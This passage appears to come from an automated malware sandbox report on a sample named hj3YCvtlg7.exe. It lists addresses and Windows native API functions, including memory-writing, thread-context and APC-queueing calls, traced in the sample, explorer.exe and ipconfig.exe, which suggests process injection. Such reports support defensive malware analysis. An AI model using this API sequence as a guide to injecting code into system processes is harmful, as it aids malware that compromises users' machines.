          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01762C70
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_01762CA0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762F30 NtCreateSection,LdrInitializeThunk,5_2_01762F30
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762FE0 NtCreateFile,LdrInitializeThunk,5_2_01762FE0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762FB0 NtResumeThread,LdrInitializeThunk,5_2_01762FB0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762F90 NtProtectVirtualMemory,LdrInitializeThunk,5_2_01762F90
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_01762EA0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_01762E80
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01764340 NtSetContextThread,5_2_01764340
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01764650 NtSuspendThread,5_2_01764650
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762BE0 NtQueryValueKey,5_2_01762BE0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762BA0 NtEnumerateValueKey,5_2_01762BA0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762B80 NtQueryInformationFile,5_2_01762B80
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762AF0 NtWriteFile,5_2_01762AF0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762AB0 NtWaitForSingleObject,5_2_01762AB0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762D00 NtSetInformationFile,5_2_01762D00
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762DB0 NtEnumerateKey,5_2_01762DB0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762C60 NtCreateKey,5_2_01762C60
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762C00 NtQueryInformationProcess,5_2_01762C00
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762CF0 NtOpenProcess,5_2_01762CF0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762CC0 NtQueryVirtualMemory,5_2_01762CC0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762F60 NtCreateProcessEx,5_2_01762F60
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762FA0 NtQuerySection,5_2_01762FA0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762E30 NtWriteVirtualMemory,5_2_01762E30
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762EE0 NtQueueApcThread,5_2_01762EE0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01763010 NtOpenDirectoryObject,5_2_01763010
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01763090 NtSetValueKey,5_2_01763090
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017635C0 NtCreateMutant,5_2_017635C0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017639B0 NtGetContextThread,5_2_017639B0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01763D70 NtOpenThread,5_2_01763D70
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01763D10 NtOpenProcessToken,5_2_01763D10
          Source: C:\Windows\explorer.exeCode function: 6_2_0FDA7E12 NtProtectVirtualMemory,6_2_0FDA7E12
          Source: C:\Windows\explorer.exeCode function: 6_2_0FDA6232 NtCreateFile,6_2_0FDA6232
          Source: C:\Windows\explorer.exeCode function: 6_2_0FDA7E0A NtProtectVirtualMemory,6_2_0FDA7E0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2AD0 NtReadFile,LdrInitializeThunk,7_2_02CF2AD0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2B60 NtClose,LdrInitializeThunk,7_2_02CF2B60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_02CF2EA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2FE0 NtCreateFile,LdrInitializeThunk,7_2_02CF2FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2F30 NtCreateSection,LdrInitializeThunk,7_2_02CF2F30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_02CF2CA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2C60 NtCreateKey,LdrInitializeThunk,7_2_02CF2C60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02CF2C70
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2DD0 NtDelayExecution,LdrInitializeThunk,7_2_02CF2DD0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02CF2DF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_02CF2D10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF35C0 NtCreateMutant,LdrInitializeThunk,7_2_02CF35C0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF4340 NtSetContextThread,7_2_02CF4340
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF4650 NtSuspendThread,7_2_02CF4650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2AF0 NtWriteFile,7_2_02CF2AF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2AB0 NtWaitForSingleObject,7_2_02CF2AB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2BE0 NtQueryValueKey,7_2_02CF2BE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2BF0 NtAllocateVirtualMemory,7_2_02CF2BF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2B80 NtQueryInformationFile,7_2_02CF2B80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2BA0 NtEnumerateValueKey,7_2_02CF2BA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2EE0 NtQueueApcThread,7_2_02CF2EE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2E80 NtReadVirtualMemory,7_2_02CF2E80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2E30 NtWriteVirtualMemory,7_2_02CF2E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2F90 NtProtectVirtualMemory,7_2_02CF2F90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2FA0 NtQuerySection,7_2_02CF2FA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2FB0 NtResumeThread,7_2_02CF2FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2F60 NtCreateProcessEx,7_2_02CF2F60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2CC0 NtQueryVirtualMemory,7_2_02CF2CC0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2CF0 NtOpenProcess,7_2_02CF2CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2C00 NtQueryInformationProcess,7_2_02CF2C00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2DB0 NtEnumerateKey,7_2_02CF2DB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2D00 NtSetInformationFile,7_2_02CF2D00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF2D30 NtUnmapViewOfSection,7_2_02CF2D30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF3090 NtSetValueKey,7_2_02CF3090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF3010 NtOpenDirectoryObject,7_2_02CF3010
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF39B0 NtGetContextThread,7_2_02CF39B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF3D70 NtOpenThread,7_2_02CF3D70
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF3D10 NtOpenProcessToken,7_2_02CF3D10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001EA360 NtCreateFile,7_2_001EA360
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001EA410 NtReadFile,7_2_001EA410
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001EA490 NtClose,7_2_001EA490
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001EA35C NtCreateFile,7_2_001EA35C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001EA40B NtReadFile,7_2_001EA40B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 0_2_073411800_2_07341180
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 0_2_010CD3640_2_010CD364
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_004010265_2_00401026
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041E1E55_2_0041E1E5
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041E2665_2_0041E266
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_004012085_2_00401208
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041DAE65_2_0041DAE6
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041DB925_2_0041DB92
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041DD875_2_0041DD87
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041D5A35_2_0041D5A3
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041E5B45_2_0041E5B4
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_00409E605_2_00409E60
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041DEB95_2_0041DEB9
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017B81585_2_017B8158
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CA1185_2_017CA118
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017201005_2_01720100
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017E81CC5_2_017E81CC
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017F01AA5_2_017F01AA
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C20005_2_017C2000
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017EA3525_2_017EA352
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173E3F05_2_0173E3F0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017F03E65_2_017F03E6
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017D02745_2_017D0274
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017B02C05_2_017B02C0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017305355_2_01730535
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017F05915_2_017F0591
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017E24465_2_017E2446
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017D44205_2_017D4420
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017DE4F65_2_017DE4F6
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017307705_2_01730770
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017547505_2_01754750
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172C7C05_2_0172C7C0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0174C6E05_2_0174C6E0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017469625_2_01746962
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017329A05_2_017329A0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017FA9A65_2_017FA9A6
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173A8405_2_0173A840
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017328405_2_01732840
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0175E8F05_2_0175E8F0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017168B85_2_017168B8
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017EAB405_2_017EAB40
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017E6BD75_2_017E6BD7
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172EA805_2_0172EA80
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CCD1F5_2_017CCD1F
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173AD005_2_0173AD00
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0172ADE05_2_0172ADE0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01748DBF5_2_01748DBF
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01730C005_2_01730C00
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01720CF25_2_01720CF2
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017D0CB55_2_017D0CB5
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A4F405_2_017A4F40
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01750F305_2_01750F30
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017D2F305_2_017D2F30
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01772F285_2_01772F28
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173CFE05_2_0173CFE0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01722FC85_2_01722FC8
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017AEFA05_2_017AEFA0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01730E595_2_01730E59
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017EEE265_2_017EEE26
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017EEEDB5_2_017EEEDB
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01742E905_2_01742E90
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017ECE935_2_017ECE93
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0171F1725_2_0171F172
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017FB16B5_2_017FB16B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0176516C5_2_0176516C
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0173B1B05_2_0173B1B0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017E70E95_2_017E70E9
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017EF0E05_2_017EF0E0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017DF0CC5_2_017DF0CC
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017370C05_2_017370C0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0171D34C5_2_0171D34C
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017E132D5_2_017E132D
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0177739A5_2_0177739A
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017D12ED5_2_017D12ED
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0174B2C05_2_0174B2C0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017352A05_2_017352A0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017E75715_2_017E7571
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CD5B05_2_017CD5B0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017214605_2_01721460
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017EF43F5_2_017EF43F
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017EF7B05_2_017EF7B0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017E16CC5_2_017E16CC
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017399505_2_01739950
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0174B9505_2_0174B950
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017C59105_2_017C5910
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0179D8005_2_0179D800
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017338E05_2_017338E0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017EFB765_2_017EFB76
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A5BF05_2_017A5BF0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0176DBF95_2_0176DBF9
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0174FB805_2_0174FB80
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A3A6C5_2_017A3A6C
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017EFA495_2_017EFA49
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017E7A465_2_017E7A46
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017DDAC65_2_017DDAC6
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017CDAAC5_2_017CDAAC
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01775AA05_2_01775AA0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017D1AA35_2_017D1AA3
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017E7D735_2_017E7D73
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017E1D5A5_2_017E1D5A
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01733D405_2_01733D40
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0174FDC05_2_0174FDC0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017A9C325_2_017A9C32
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017EFCF25_2_017EFCF2
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017EFF095_2_017EFF09
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_017EFFB15_2_017EFFB1
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01731F925_2_01731F92
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01739EB05_2_01739EB0
          Source: C:\Windows\explorer.exeCode function: 6_2_0E3B52326_2_0E3B5232
          Source: C:\Windows\explorer.exeCode function: 6_2_0E3AFB326_2_0E3AFB32
          Source: C:\Windows\explorer.exeCode function: 6_2_0E3AFB306_2_0E3AFB30
          Source: C:\Windows\explorer.exeCode function: 6_2_0E3B40366_2_0E3B4036
          Source: C:\Windows\explorer.exeCode function: 6_2_0E3AB0826_2_0E3AB082
          Source: C:\Windows\explorer.exeCode function: 6_2_0E3B29126_2_0E3B2912
          Source: C:\Windows\explorer.exeCode function: 6_2_0E3ACD026_2_0E3ACD02
          Source: C:\Windows\explorer.exeCode function: 6_2_0E3B85CD6_2_0E3B85CD
          Source: C:\Windows\explorer.exeCode function: 6_2_0FDA62326_2_0FDA6232
          Source: C:\Windows\explorer.exeCode function: 6_2_0FDA95CD6_2_0FDA95CD
          Source: C:\Windows\explorer.exeCode function: 6_2_0FDA39126_2_0FDA3912
          Source: C:\Windows\explorer.exeCode function: 6_2_0FD9DD026_2_0FD9DD02
          Source: C:\Windows\explorer.exeCode function: 6_2_0FDA0B326_2_0FDA0B32
          Source: C:\Windows\explorer.exeCode function: 6_2_0FDA0B306_2_0FDA0B30
          Source: C:\Windows\explorer.exeCode function: 6_2_0FD9C0826_2_0FD9C082
          Source: C:\Windows\explorer.exeCode function: 6_2_0FDA50366_2_0FDA5036
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00C739FE7_2_00C739FE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D402C07_2_02D402C0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D602747_2_02D60274
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CCE3F07_2_02CCE3F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D803E67_2_02D803E6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D7A3527_2_02D7A352
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D520007_2_02D52000
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D781CC7_2_02D781CC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D801AA7_2_02D801AA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D741A27_2_02D741A2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D481587_2_02D48158
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CB01007_2_02CB0100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D5A1187_2_02D5A118
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CDC6E07_2_02CDC6E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CBC7C07_2_02CBC7C0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CE47507_2_02CE4750
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CC07707_2_02CC0770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D6E4F67_2_02D6E4F6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D724467_2_02D72446
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D644207_2_02D64420
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D805917_2_02D80591
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CC05357_2_02CC0535
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CBEA807_2_02CBEA80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D76BD77_2_02D76BD7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D7AB407_2_02D7AB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CEE8F07_2_02CEE8F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CA68B87_2_02CA68B8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CCA8407_2_02CCA840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CC28407_2_02CC2840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CC29A07_2_02CC29A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D8A9A67_2_02D8A9A6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CD69627_2_02CD6962
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D7EEDB7_2_02D7EEDB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D7CE937_2_02D7CE93
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CD2E907_2_02CD2E90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CC0E597_2_02CC0E59
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D7EE267_2_02D7EE26
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CB2FC87_2_02CB2FC8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CCCFE07_2_02CCCFE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D3EFA07_2_02D3EFA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D34F407_2_02D34F40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D62F307_2_02D62F30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D02F287_2_02D02F28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CE0F307_2_02CE0F30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CB0CF27_2_02CB0CF2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D60CB57_2_02D60CB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CC0C007_2_02CC0C00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CBADE07_2_02CBADE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CD8DBF7_2_02CD8DBF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D5CD1F7_2_02D5CD1F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CCAD007_2_02CCAD00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CDB2C07_2_02CDB2C0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D612ED7_2_02D612ED
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CC52A07_2_02CC52A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D0739A7_2_02D0739A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CAD34C7_2_02CAD34C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D7132D7_2_02D7132D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CC70C07_2_02CC70C0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D6F0CC7_2_02D6F0CC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D7F0E07_2_02D7F0E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D770E97_2_02D770E9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CCB1B07_2_02CCB1B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CF516C7_2_02CF516C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D8B16B7_2_02D8B16B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CAF1727_2_02CAF172
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D716CC7_2_02D716CC
